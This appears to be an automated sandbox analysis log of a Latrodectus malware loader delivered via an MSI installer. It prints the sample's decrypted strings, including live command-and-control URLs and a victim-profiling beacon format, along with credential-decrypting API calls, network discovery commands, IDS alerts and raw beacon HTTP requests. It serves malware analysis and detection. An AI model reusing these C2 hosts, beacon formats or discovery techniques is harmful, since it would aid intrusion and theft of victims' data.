            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "subproc": [
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &desklinks=[
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: *.*
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "%s"
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Update_%x
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Custom_update
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: .dll
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: .exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Error
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: runnung
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %s/%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: front
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: /files/
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Lambda
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Cookie:
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: POST
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: GET
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: curl/7.88.1
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: CLEARURL
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: URLS
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: COMMAND
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: ERROR
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: DR2HpnCotlUgjMnaEE9p4nTXYS0dKcCqcD0K4aPi1LctrLPoDHUhq75vfji41aMg
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: [{"data":"
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: "}]
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &dpost=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: https://reateberam.com/test/
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: https://dogirafer.com/test/
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: \*.dll
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: AppData
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Desktop
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Startup
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Personal
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Local AppData
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: <html>
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: <!DOCTYPE
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %s%d.dll
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Content-Length: 0
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Content-Type: application/dns-message
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: 12345
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: 12345
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &stiller=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %s%d.exe
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %x%x
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &mac=
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %02x
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: :%02x
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &computername=%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: &domain=%s
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: LogonTrigger
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: \Registry\Machine\
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: TimeTrigger
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: PT0H%02dM
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: PT0S
            Source: 9.2.explorer.exe.3110000.0.raw.unpackString decryptor: \update_data.dat
            Source: C:\Windows\explorer.exeCode function: 9_2_0E625E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,9_2_0E625E5C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E625FE4 CryptUnprotectData,9_2_0E625FE4
            Source: C:\Windows\explorer.exeCode function: 9_2_0E628568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,9_2_0E628568
            Source: C:\Windows\explorer.exeCode function: 9_2_0E62453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,9_2_0E62453C
            Source: C:\Windows\explorer.exeCode function: 9_2_0E626078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,9_2_0E626078
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49851 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49894 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49904 version: TLS 1.2
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI17D3.tmp, 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, MSI17D3.tmp, 00000003.00000000.1684254663.0000000000CF7000.00000002.00000001.01000000.00000003.sdmp, fes.msi, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr

            Spreading

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\Installer\MSI17D3.tmpCode function: 3_2_00CEB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00CEB02D
            Source: C:\Windows\explorer.exeCode function: 9_2_0311A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,9_2_0311A8E0
            Source: C:\Windows\explorer.exeCode function: 9_2_03112B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,9_2_03112B28
            Source: C:\Windows\explorer.exeCode function: 9_2_031204C0 FindFirstFileW,9_2_031204C0
            Source: C:\Windows\explorer.exeCode function: 9_2_0E626604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,9_2_0E626604
            Source: C:\Windows\explorer.exeCode function: 9_2_0E6216F4 FindFirstFileW,FindNextFileW,LoadLibraryW,9_2_0E6216F4

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49851 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49894 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49886 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49869 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49861 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49926 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.4:49904 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49918 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49878 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49933 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49940 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49962 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49948 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49956 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49994 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50002 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50008 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49979 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49972 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50016 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50025 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50029 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50032 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50036 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50034 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50038 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50041 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50043 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50033 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50037 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50040 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50030 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49986 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50042 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50049 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50045 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50048 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50046 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50035 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50031 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50047 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50039 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50044 -> 104.21.68.89:443
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.68.89 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 103.57.249.207 6542Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.43.224 6542Jump to behavior
            Source: Malware configuration extractorURLs: https://reateberam.com/test/
            Source: Malware configuration extractorURLs: https://dogirafer.com/test/
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 103.57.249.207:6542
            Source: global trafficTCP traffic: 192.168.2.4:49732 -> 94.232.43.224:6542
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN
            Source: Joe Sandbox ViewASN Name: WELLWEBNL WELLWEBNL
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49851 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49869 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49886 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49926 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49948 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49979 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49986 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49994 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50008 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50016 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50025 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50030 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50029 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50031 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50047 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50037 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49886 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49904 -> 104.21.68.89:443
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
